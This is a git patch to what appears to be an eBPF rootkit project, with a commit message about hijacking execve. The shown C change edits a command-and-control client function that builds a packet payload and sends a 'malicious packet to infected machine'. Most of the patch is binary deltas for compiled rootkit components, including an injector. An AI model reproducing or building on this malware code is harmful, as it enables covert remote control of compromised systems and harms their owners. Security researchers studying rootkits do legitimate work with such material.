From 8be536fb6fa0d666d8874d7e7c11c91ef644987a Mon Sep 17 00:00:00 2001
From: h3xduck <marcossanchezbajo@gmail.com>
Date: Thu, 14 Apr 2022 13:24:43 -0400
Subject: [PATCH] Added locking mechanism for execve_hijack. Incorporated new
 library rawtcp with latest version without bug.

---
 src/.output/kit.o              | Bin 87192 -> 87192 bytes
 src/.output/kit.skel.h         |  12 ++++++------
 src/bin/kit                    | Bin 1586496 -> 1586496 bytes
 src/client/client.c            |   8 +++-----
 src/client/client.o            | Bin 13976 -> 14560 bytes
 src/client/injector            | Bin 46136 -> 46136 bytes
 src/client/lib/libRawTCP_Lib.a | Bin 51708 -> 51708 bytes
 src/ebpf/include/bpf/exec.h    |   2 ++
 src/helpers/execve_hijack      | Bin 42016 -> 46208 bytes
 src/helpers/execve_hijack.c    |  34 ++++++++++++++++++++++++---------
 src/helpers/execve_hijack.o    | Bin 9224 -> 9792 bytes
 11 files changed, 36 insertions(+), 20 deletions(-)

diff --git a/src/.output/kit.o b/src/.output/kit.o
index 01a583477514f2c5a867138a15c7f331bd12368e..1c10bba3e18585956fc142e84bf07e7295081e95 100644
GIT binary patch
delta 93
zcmbQSl6A&P)(wpl1ZOZaa4;}1{N-U_=wxPK5Sz1k(gc52Lmg%Y4K9fA5ite^Rs&{+
g04V<}h;PEoPyywuhy(c+lZB?eXWX)xY5KIi02{X!N&o-=

delta 93
zcmbQSl6A&P)(wpl1Sc>va4;}1{N-U_=wxPK5Sy}j(gc52LltHQ4K9fA5ite^Rt;u`
g04V<}h_A!UPyywuhy(cslZB?eXI!(HY5KIi01{Ug5&!@I

diff --git a/src/.output/kit.skel.h b/src/.output/kit.skel.h
index 4e4445d..5a38f70 100644
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
@@ -1695,8 +1695,8 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
 \x0c\0\0\x0d\x70\0\0\x90\x02\0\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\x98\x02\0\
 \0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\xa8\x02\0\0\xe8\x02\0\0\0\0\0\0\0\0\0\0\
 \xf8\x02\0\0\xe8\x02\0\0\xc1\x07\0\0\x01\x0c\x04\0\xe0\x0c\0\0\x69\0\0\0\0\0\0\
-\0\xfd\x0c\0\0\x2b\x0d\0\0\0\x90\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\
-\x94\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\
+\0\xfd\x0c\0\0\x2b\x0d\0\0\0\x98\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\
+\x9c\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\
 \0\x67\x0d\0\0\x08\x64\x01\0\x38\0\0\0\xfd\x0c\0\0\x84\x0d\0\0\x05\x70\x01\0\
 \x60\0\0\0\xfd\x0c\0\0\xb2\x0d\0\0\x0b\x78\x01\0\xc0\0\0\0\xfd\x0c\0\0\xe1\x0d\
 \0\0\x0a\x80\x01\0\x10\x01\0\0\xfd\x0c\0\0\x0b\x0e\0\0\x12\x84\x01\0\x18\x01\0\
@@ -1749,9 +1749,9 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
 \x08\x08\x03\0\x88\x09\0\0\xfd\x0c\0\0\x1d\x16\0\0\x09\x0c\x03\0\xa8\x09\0\0\
 \xfd\x0c\0\0\x44\x16\0\0\x3c\x14\x03\0\xc0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\
 \x14\x03\0\xd0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\x14\x03\0\xd8\x09\0\0\xfd\
-\x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x24\
-\x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x28\x03\0\x50\x0a\0\0\xfd\x0c\0\
-\0\xf5\x16\0\0\x05\x2c\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x30\x03\0\
+\x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x2c\
+\x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x30\x03\0\x50\x0a\0\0\xfd\x0c\0\
+\0\xf5\x16\0\0\x05\x34\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x38\x03\0\
 \xb8\x0a\0\0\xfd\x0c\0\0\0\0\0\0\0\0\0\0\xc0\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\
 \x08\x18\x01\0\xd8\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\x08\x18\x01\0\xe0\x0a\0\0\
 \xfd\x0c\0\0\x8f\x11\0\0\x09\x1c\x01\0\x18\x0b\0\0\xfd\x0c\0\0\x83\x17\0\0\x08\
@@ -1761,7 +1761,7 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
 \0\xc0\x17\0\0\x09\x34\x01\0\x88\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x27\x48\x01\0\
 \xa0\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x05\x48\x01\0\xb8\x0b\0\0\xfd\x0c\0\0\xbd\
 \x11\0\0\x08\x80\x02\0\xc0\x0b\0\0\xfd\x0c\0\0\x58\x18\0\0\x09\x84\x02\0\xe0\
-\x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xac\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\
+\x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xb4\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\
 \xdf\x18\0\0\x04\x19\0\0\0\xd4\0\0\x08\0\0\0\xdf\x18\0\0\x2d\x19\0\0\x29\xe0\0\
 \0\x10\0\0\0\xdf\x18\0\0\x63\x19\0\0\x25\xe4\0\0\x18\0\0\0\x8d\x19\0\0\xc8\x19\
 \0\0\x15\x30\0\0\x28\0\0\0\xdf\x18\0\0\x01\x1a\0\0\x08\x0c\x01\0\x30\0\0\0\xdf\
diff --git a/src/bin/kit b/src/bin/kit
index dcc20a74dc0727eee5a779c80d58b333b17cd316..2cb51046122c5f64df1fdc888f9f972cf4077470 100755
GIT binary patch
delta 214
zcmX@`D&fGZgbfwUBGHP!&mZI}3sTy3_>WR*hFZ&>9c9fu%<VnQj6lq^y@#1uwMlRW
zGXn<$1H)e)28K>%1_rS?+Yhxe`?DJAFf(XyLBx-UF)*+iFf#-|`CmbN6J~}AC|^Y!
z$hVm8)Xn^!aZ9@q&<dj-79eH?Vm2UV2VxE&<^*CcAm#>Q9w6ogVm=_|2Vwyr76f7;
UAQlE<5g--?VzKQ;J>q;T0Siw+(f|Me

delta 214
zcmX@`D&fGZgbfwUB9W{foEe{upSCw&+|p8gZMCS{CH3YW=Jp<DMj&R|-ownS+9WuE
znSq0Wf#EL?14Ab>1B2L<?T1>K{aFoFm>D#<AmT^F7#LVJm>B|~{I4Ls4l_dql&>NV
z<Qq(P>Slh=xTf6*XoXP^3lOscF&hxG12G2>a{@6J5OV`D4-oSLF&_}~1F--Q3j(na
U5DNpb2oQ?`vDkK_9&x^v0DOf&2mk;8

diff --git a/src/client/client.c b/src/client/client.c
index 17b743c..ac28ac9 100644
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -201,7 +201,7 @@ void activate_command_control_shell_encrypted(char* argv){
     char* payload = malloc(SYN_PACKET_PAYLOAD_LEN);
     srand(time(NULL));
     for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){
-        payload[ii] = rand();
+        payload[ii] = (char)rand();
     }
     //Follow protocol rules
     char section[SYN_PACKET_SECTION_LEN];
@@ -231,9 +231,7 @@ void activate_command_control_shell_encrypted(char* argv){
     strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN);
     
     
-
-
-    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);
+    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
     printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
     //Sending the malicious payload
     if(rawsocket_send(packet)<0){
@@ -294,7 +292,7 @@ void main(int argc, char* argv[]){
     char path_arg[512];
 
     //Command line argument parsing
-    while ((opt = getopt(argc, argv, ":S:c:h:e")) != -1) {
+    while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {
         switch (opt) {
         case 'S':
             print_welcome_message();
diff --git a/src/client/client.o b/src/client/client.o
index 04cc106c91e780e48a7e73bbc2e7e1693e4cca0f..80981cfeb795304f0be7d6f4ce8d4c4db2049f81 100644
GIT binary patch
delta 4048
zcmbuBe{2**6vy|rz3UH3uRrKr4=9DSz(Ff5{ec7t)D*)4HMXLpQ4%1CHYzbf#0rEB
zwg+5}Q^K?fs3atkfQevBtzaXx8nvf3+8T%?7*k9oL<uS((Ezc&H}iJ;7_I-f$?eR1
z-mmYQoxQt5n}=UK5H_b*ch0R%N$oQX!-}437B8g~rXA`X9kpVS=3eoh8S*rXGbzRP
zQDD8`WL(2rv|kSWk$r#>{8FU&CozevjR{DAF_tH>FRMjDPs=%U_wTy!bbsU;%+?%(
z$<Hup&V|W!m=w;jVsRN3kBq>&$AsKg^lQs@EA9s@D=v&haBdy)f6(Sd=dpFG7t_xN
zG0J0KoA(BQ7P$l&NIkoH9f@(vXT>AvLG?bjqTk4VTo2na!Q~!FuA&1F=qSQDSLCc)
zz1SxzQp8n+OHd>St|<LpMfN`>NzwnN$Q5m2lB-a_-9}e)8&IivWh{bouGv|)dNCF?
zxAoe}WvmV5<hFrJXhROWPL3&<cyAkHUBn|DST+`KmP5Ndb1m0XN4xRyKlq`MWf&`>
z2`f6(6D~3gu{*gaGzgZ_?u5Me$@^J(?-1vb7kg^N?c_Hy&eztidwBKoA~-eW;;473
zzXn{aShrI~eC4gGQLNoUQ&b6wwqq_3UN49CMrFe?R<s>!f^EHmgJP+#_&?PYh{L|z
z=Vh6AHSV)TI}b_zZ*e6>35%Ris}uOD2D;`=_{<cZ%y}X!Gp(yE)AA;5TGZ6FJvYb9
zy66QJ4`pWUF>5FKk_Nn8Z{;N?rAZ2g*ThgTDEji7%pWqk=7#oUcnU=4%%Eq#yr06m
zU66*27)COD;E5P_N7c1-9KK;3{^K~jFdeh2{CO}s`R6L0W8il|5`5Zl0#})62nRiD
z#Eft-w26Wpp9|#kEc%4DY1Rx(1J@2|eO0qABkNviZP%<@$$CU|Lgr(dbthThk+B_`
z^(0w)#FcQ+{+L-OgBqvdi^OrGr!an#@u`ewPk;qn=+F5|#tXpa<c}(D%K*O9BNX6l
zVh_o^!4jpiM0pvofC~!;;Nui1Chp`JpgeP!zt0f!O438snya(-i^PnQ;0jB#-ljzL
zEK!IR?$-QGR0dbCxKa|Fe~Cq5M~>XQiPFhEUv(5USqzm1MPq5cy<77*fiDwW@p1SO
z;+P0OPNn0F&t&|RmS-m^=u%vKSDJ12FrQg0c7Wx~W&ASZlNi6nIM?<U<6N6J6M_xH
zcDLtU5|^$FvOym!kWCz)J{MZV{JGEy#`9U8Rg5P?eRmfhX9lixEpg}AjgZg{%%2Nw
zV*Xs{cINL2wc*Py$_&$((&LP$Fy6^H{G7QBoFR@vXEWZ%IG*%kI%Z!2hyK-B;xFL0
zEPyAv%s3{hqeMRu$Bp56er22s_4u)>tZN&*vk7Ac{GoO`D<tkbf^AfI4)YH)|2oaT
zmHZo+zj|Z~)sM|aX5fN0GtLF=_KV5)&9Von!4Arg`tb7y@%J@;hxl2Ij}re#<4IJ$
zPvc)Gf7|#}GdLTV(72xx4QM=<_@Ksv#4l)k3h_&l!{Ko{cAn7pT0jv63~PKg@ez%e
z5WlAJGUC@c$HQAmhTpgW`2EChY5W1=e`<Uw@w*zYC2rt(fy-%lIdJvzXogi3kgD-V
zh-YYgHSsKs-=QzgNg98W{PTUPzN=^*8K!Ch&e@)>@n^`tSmVzT4{Q7d;-xO9=f9N<
z<*q?()62xGG`@rQLXF$R7i+wQc#X#QIswZxLyQ6}jlWL3PUC`jy~YpHYx$VQ-z5Jh
z8a2c36tGs~Z&Sc}jUOlel*SwU;^6%A@TXZkT5;9f>lceE7o?ZtpDnno9I?G}f!XgD
zow)&#s0=&P)T*$V@QaG7C1!J(*aAa&K%9nQO+dP)R)@{TfT*Yjdq8Y~VYpJ9hT%X^
X+=QWNil|tyB>iZWs`H8gWvBfOYdlFK

delta 3413
zcmbW3e@t6d6vtm*p-`Z<b7iFrWph}{(8&-AA|b^6NJGd*4B~=6Ql?voab`G&4%s@g
z6^F=z-qkexvA{AHVwg^fx)2#;G15O4hlD>+7emZu7DtxF%xqyZc<y`W!to^g$D6#~
z_de(QJ@?!n@1=7su|2(heYW_k^_x;s`!!7qc8$fv{*+w%;P~QVusaeP7hmdLOH6#5
zlGk(&*f@x^>++{-(&#25rvXcFW1Yz_b{i=8S^^SCPtcM$<~m|P%aJiDcOIJAJsG(P
zcMYe5-93h=Co(Vg+TAO9A`{Zn{dLUfqJyF-DP{?Y%V~Y$M6%x*V$uHel4nd7ZI+=f
z)87?M7{bV2GtGNuY|7}Ovu5nDD7U?{-EjAm$~gpaR#5r>&w0<*5cfGw>B%yqCVp~m
z5OYp@e9;+9wl-Jniq~X5th=-%h;4bu)v0fC*sOP~@i#q5R=YtVa9j*{J)$?eS+}Rh
z7qUAuEa{>n-xDrOl_@n%hsz4rv+@U84RV<@6R!J<W_y9@Pe>!QMxwXDv(k4EzKZZ(
zlZTfEp20*>VxWlzkgGy7u+TFP(4S@c&8Q##k3PIy=>#+ELqmcXykrKKnZ6zMGel1(
z@GH}wmHKM9t`UR0RZBNd4B3Qhc6fj$w`R2%%lGWbfji}@BvH!u6aEO%j}T5b+L;C-
zXllJjae7|yae>EDEn55@?{=oSgqnIW0MQVOsvX#6ME9}i0(##U8w)(%ITqFBWTE{j
zM-N-m%_j-vt(to^a#eFJy0#EK-I5mxPa%1RSe`-i#naB4eEHC-K!PNaW2%Ct34fgM
zpV<KISm<v=PYb<9^gfLo+B?Lsk_=$WfCp$YuNy8^P%h!L&;r6~p+(5miVjH=jIWgv
z1Ff`@7<^>lZA4ECeTDEWqHiUf7J3-C9N(B3t@Hyls7kL&7qpK^B3h^*dRpjbL{AGH
zS>|EwQAn(obb2|U(L;2Fa2L`4j$9U+PxuYO<-3rFhwg8Z$NW6JWPXbOAqJYr<^VS|
zwGy?M$c0=k4E@ez6YdfR3)eLTC;_#aY7NWWika()-cR)JGW}81w~LlSPw{c$q6-%z
zoG#puL+pIY7ruwnK8MNVH0AXe+C~`nAwSRfdgR|Rz5)3J<G0Om!`k;OpjIovcm*c9
z#CR3*DaM~eKEwD{<g*5c!>?wnw&MyjY(v8w<If|%%6J3v>x?%dpQl{De6M2Q77YO3
ziTpO>yOG~z{0-#y8Gj48CSO=+YQk>=H(!1hXhlOR<88<@7(ayE#kdd8mYeZT)Mweu
z@s}$45Cb{Ppw9Lh#y>%Q9^;=P_cPvy{D~!w`+pJxMN0v5nNA@uVf+m8a>hSLUdi|u
z$g3G24r5?53w(n-$oMGoTE;IRuVZ`+x1gT!A5h=8g9UOh@G|2+A`dY>jr?`S+a2PU
zr!T<YW6@XghhrF3#`zO#%T|j1(yX-5YU5d(S|Ki$2K2uiq9b#aa0UG8whnIZIz(Hb
zN-ug+j6xT3iv{R9-G;QT%&#AFi?*^Veb6mNp^I%43(!quii&c0@`|?dD*KLNbDRUh
H63G1*?g8VT

diff --git a/src/client/injector b/src/client/injector
index 9a7aad0022ab133e779c8eed5b9da7188c344103..96103097aef6a14450e19bc11859395fb897e9a2 100755
GIT binary patch
delta 4596
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
HSB3t6t^5=&

delta 4000
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
